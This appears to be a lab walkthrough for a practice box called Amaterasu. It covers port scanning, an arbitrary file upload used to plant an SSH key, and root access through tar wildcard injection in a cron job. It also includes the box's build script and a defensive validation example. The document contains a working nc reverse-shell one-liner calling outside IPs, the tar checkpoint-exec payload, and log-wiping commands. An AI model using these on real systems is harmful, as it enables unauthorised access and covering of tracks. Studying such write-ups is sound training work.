Amaterasu
nmap
nmap -p21,25022,33414,40080 -sV -sC -T4 -Pn -oA 192.168.152.249-nmap 192.168.152.249
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-10 01:23 +08
Nmap scan report for 192.168.152.249
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 68c605e8dcf29a2a789beea1aef6381a (ECDSA)
|_ 256 e989ccc21714f3bc6221064a5e7180ce (ED25519)
33414/tcp open unknown
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/2.2.3 Python/3.9.13
| Date: Tue, 09 Jan 2024 17:23:47 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| Help:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request syntax ('HELP').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
| </html>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
40080/tcp open http Apache httpd 2.4.53 ((Fedora))
|_http-server-header: Apache/2.4.53 (Fedora)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: My test page
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.23 seconds
Port 21 accepts anonymous login, but no command returns a usable result (the directory listing times out).
Summary of open ports:
21/tcp open ftp vsftpd 3.0.3
25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
33414/tcp open unknown (answers HTTP/1.1 404 NOT FOUND, Server: Werkzeug/2.2.3 Python/3.9.13)
40080/tcp open http Apache httpd 2.4.53 ((Fedora))
dirb
/help
0 "GET /info : General Info"
1 "GET /help : This listing"
2 "GET /file-list?dir=/tmp : List of the files"
3 "POST /file-upload : Upload files"
/info
0 "Python File Server REST API v2.5"
1 "Author: Alfredo Moroder"
2 "GET /help = List of the commands"
User located by listing /home/ through the file-list endpoint:
192.168.224.249:33414/file-list?dir=/home/
alfredo
File upload POST request (the handler saves under the client-supplied filename form field, so an absolute path lands outside /tmp):
curl -F file="@letmein.txt" -F filename="/home/alfredo/.ssh/authorized_keys" -X POST -H "Content-Type: multipart/form-data" 'http://192.168.152.249:33414/file-upload' -x 127.0.0.1:8080
{"message":"File successfully uploaded"}
Note: letmein.txt contains your generated SSH public key.
Log in as alfredo with the private key matching the uploaded public key:
ssh alfredo@192.168.152.249 -p 25022 -i /home/kali/letmein
.bash_history
app.py
from flask import Flask
UPLOAD_FOLDER = '/tmp'
app = Flask(__name__)
#app.secret_key = "secret key"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
file-upload.py (main.py)
import os
import urllib.request
from app import app
from flask import Flask, request, redirect, jsonify
from werkzeug.utils import secure_filename   # imported but never applied

ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
UPLOAD_DIRECTORY = '/'

def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/info', methods=['GET'])
def show_info():
    """Endpoint to list files on the server."""
    info = []
    info.append('Python File Server REST API v2.5')
    info.append('Author: Alfredo Moroder')
    info.append('GET /help = List of the commands')
    return jsonify(info)

@app.route('/help', methods=['GET'])
def show_help():
    """Endpoint to list files on the server."""
    info = []
    info.append('GET /info : General Info')
    info.append('GET /help : This listing')
    info.append('GET /file-list?dir=/tmp : List of the files')
    info.append('POST /file-upload : Upload files')
    return jsonify(info)

@app.route('/file-list', methods=['GET'])
def list_files():
    """Endpoint to list files on the server."""
    # 'dir' is used as given: any directory readable by the service user
    # can be listed (this is how /home/ revealed the user alfredo).
    folder = ""
    if len(request.args.get("dir")) == 0:
        folder = "/tmp"
    else:
        folder = request.args.get("dir")
    files = []
    for filename in os.listdir(folder):
        path = os.path.join(folder, filename)
        files.append(filename)
    return jsonify(files)

@app.route('/file-upload', methods=['POST'])
def upload_file():
    # check if the post request has the file part
    if 'file' not in request.files:
        resp = jsonify({'message' : 'No file part in the request'})
        resp.status_code = 400
        return resp
    if 'filename' not in request.form:
        resp = jsonify({'message' : 'No filename part in the request'})
        resp.status_code = 400
        return resp
    file = request.files['file']
    filename = request.form['filename']
    if file.filename == '':
        resp = jsonify({'message' : 'No file selected for uploading'})
        resp.status_code = 400
        return resp
    if file and allowed_file(file.filename):
        # The extension check runs on the uploaded file's own name, but the
        # file is saved under the separate 'filename' form field. os.path.join
        # discards UPLOAD_FOLDER when that field is an absolute path, so the
        # write can land anywhere the service user (alfredo) can write.
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        resp = jsonify({'message' : 'File successfully uploaded'})
        resp.status_code = 201
        return resp
    else:
        resp = jsonify({'message' : 'Allowed file types are txt, pdf, png, jpg, jpeg, gif'})
        resp.status_code = 400
        return resp

if __name__ == "__main__":
    app.run(host='0.0.0.0',port='33414')
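An added example (not the box's or the author's code) of the confinement that the /file-list and /file-upload handlers above lack: the filename is accepted only as a bare basename, the extension check is applied to the name that will actually be written, and the dir parameter is resolved and proven to sit under a fixed root. Root directories and function names are assumptions for this example.

```python
import os
from pathlib import Path

# Roots are assumptions for this example; the box used /tmp for uploads.
UPLOAD_ROOT = Path("/tmp").resolve()
LIST_ROOT = Path("/tmp").resolve()
ALLOWED_EXTENSIONS = {"txt", "pdf", "png", "jpg", "jpeg", "gif"}


def allowed_file(name):
    # Same rule as the app, but applied to the name that will be written.
    return "." in name and name.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def within(root, candidate):
    """True when candidate resolves to root itself or to something beneath it."""
    candidate = Path(candidate).resolve()
    return candidate == root or root in candidate.parents


def check_upload_name(requested, root=UPLOAD_ROOT):
    """Validate the client-supplied 'filename' field of /file-upload.

    Returns (target_path, None) when it may be written, else (None, reason).
    os.path.join(UPLOAD_FOLDER, filename) discards the folder when filename is
    absolute; here any separator is rejected outright, not silently stripped.
    """
    if not requested:
        return None, "empty filename"
    if os.path.basename(requested) != requested:
        return None, "path separators or traversal in filename"
    if requested.startswith("."):
        return None, "dot-file names are refused"
    if not allowed_file(requested):
        return None, "extension not allowed"
    target = root / requested
    # A pre-planted symlink such as /tmp/x.txt -> a file elsewhere would
    # resolve outside root and is refused here.
    if not within(root, target):
        return None, "target resolves outside upload root"
    return target, None


def check_list_dir(requested, root=LIST_ROOT):
    """Confine the 'dir' parameter of /file-list (the app listed /home/)."""
    # Path(root, requested) replaces root when requested is absolute,
    # exactly like os.path.join; the within() check is what catches it.
    target = Path(root, requested or ".")
    if not within(root, target):
        return None, "directory outside listing root"
    return target.resolve(), None
```

A rejected name is worth logging with the client address, since a filename containing separators or an absolute dir value is a traversal attempt, not a user error.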
Priv Esc
[alfredo@fedora opt]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/1 * * * * root /usr/local/bin/backup-flask.sh
Reading the script:
[alfredo@fedora opt]$ ls -l /usr/local/bin/backup-flask.sh
-rwxr-xr-x. 1 root root 106 Mar 28 2023 /usr/local/bin/backup-flask.sh
[alfredo@fedora opt]$ cat /usr/local/bin/backup-flask.sh
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
tar is run with a bare * wildcard inside /home/alfredo/restapi, so the shell expands every file name in that directory into tar arguments, including names that look like tar options (wildcard injection). The directory is owned by alfredo and the job runs as root from cron every minute.
pivot to root
cd /home/alfredo/restapi
nano exex.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.158 443 >/tmp/f
echo "" > "--checkpoint-action=exec=sh exex.sh"
echo "" > --checkpoint=1
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.146.158 4455 >/tmp/f" > exex.sh
run.sh (the build script of the box, which also shows how the cron job and the decoy services were set up)
#!/usr/bin/env bash
set -e
cd /root
cat << 'EOT' > /etc/systemd/system/pythonflask.service
[Unit]
Description=PythonFlask
After=network-online.target
[Service]
Type=simple
PIDFile=/run/pythonflask.pid
ExecStart=/usr/bin/python3 /home/alfredo/restapi/main.py
User=alfredo
Group=alfredo
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
EOT
systemctl daemon-reload
systemctl enable pythonflask
systemctl start pythonflask
# -----------------
# Priv esc vuln
base64 -d << 'EOT' > /usr/local/bin/backup-flask.sh
IyEvYmluL3NoCmV4cG9ydCBQQVRIPSIvaG9tZS9hbGZyZWRvL3Jlc3RhcGk6JFBBVEgiCmNkIC9o
b21lL2FsZnJlZG8vcmVzdGFwaQp0YXIgY3pmIC90bXAvZmxhc2sudGFyLmd6ICoKCg==
EOT
echo "*/5 * * * * root /usr/local/bin/backup-flask.sh" >> /etc/crontab
chmod +x /usr/local/bin/backup-flask.sh
# -----------------
# Decoys
yum -y install vsftpd
cat << 'EOT' > /etc/vsftpd/vsftpd.conf
listen=YES
anonymous_enable=YES
write_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO
EOT
cd /var/ftp/pub
git clone https://github.com/Azure-Samples/cognitive-services-REST-api-samples cognitive
cd cognitive
rm -rf .git
systemctl enable vsftpd
systemctl start vsftpd
# ----
cd /var/www/html
git clone https://github.com/mdn/beginner-html-site-styled .
rm -rf .git/
rm -f *.md
sed -i "s/Listen 80/Listen 40080/g" /etc/httpd/conf/httpd.conf
systemctl enable httpd
systemctl start httpd
# =====================
# END Building AMATERASU
# Firwall
yum -y install iptables-services
systemctl enable iptables
iptables -X
iptables -F
iptables -I INPUT 1 -i lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 25022 -j ACCEPT
iptables -A INPUT -p tcp --dport 33414 -j ACCEPT
iptables -A INPUT -p tcp --dport 40080 -j ACCEPT
iptables -A INPUT -p tcp --dport 139 -j ACCEPT
iptables -A INPUT -p tcp --dport 111 -j ACCEPT
iptables -A INPUT -p tcp --dport 2049 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 445 -j ACCEPT
iptables -A INPUT -p tcp --dport 10000 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT
iptables -A INPUT -j DROP
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 25022 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 25022 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 40080 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 40080 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 33414 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 33414 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 139 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 139 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 111 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 111 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 445 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 445 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 2049 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 2049 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 10000 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 10000 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT
iptables -A OUTPUT -j DROP
iptables-save > /etc/sysconfig/iptables
# Cleaning up
find /var/log -type f -exec sh -c "cat /dev/null > {}" \;
rm -rf /tmp/*
rm -rf /root/.cache
cat /dev/null > /root/.bash_history && history -c && shutdown now